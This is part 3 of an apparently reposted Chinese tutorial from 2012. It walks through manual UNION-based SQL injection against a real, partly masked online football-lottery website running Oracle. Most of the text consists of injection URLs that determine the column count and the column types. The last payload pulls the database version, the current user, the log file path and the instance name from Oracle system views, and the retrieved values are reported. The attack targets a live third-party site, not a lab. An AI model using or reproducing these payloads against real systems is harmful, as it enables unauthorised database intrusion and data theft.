手工Oracle注入某足彩在线网站(3) |
| 发布时间: 2012/7/7 11:28:35 |
|
很显然,提交的字段类型不正确,所以查询出错。于是改为提交:
http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select null,null,null,null,null,null,null from dual 返回正常页面,说明字段数目确实为7个,但是需要确定字段类型。依次提交如下: http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select 'null',null,null,null,null,null,null from dual //返回正常页面 http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select null,'null',null,null,null,null,null from dual //返回错误页面 http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select null,null,'null',null,null,null,null from dual //返回正常页面 http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select null,null,null,'null',null,null,null from dual //返回正常页面 …… 上面的查询中,用'null'字符串检测该字段处是否为字符型,如果返回正常页面则说明为字符型数据,返回错误页面,则说明该处为数字型。 提交检测完毕后,确认1,3,4,6,7位置处为字符型。提交如下: http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select '1',2,'3','4',5,'6','7' from dual 返回正常页面(图3),说明字段类型正确。 图3 确认数据类型 检测注入点信息 对注入点进行简单的信息检测,可选择字符型字段处显示要查询的信息,提交如下: http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select (select banner from sys.v_$version where rownum=1),2,(select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual), (select member from v$logfile where rownum=1),5,'6', (select instance_name from v$instance) from dual 从返回页面中得到各种信息(图4): 数据库版本为Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bi; 前数据库连接用户名为TOTO; 操作系统平台为Linux; 服务器sid为racdb2。 图4 返回注入点各种信息 本文出自:亿恩科技【www.enkj.com】 |
京公网安备41019702002023号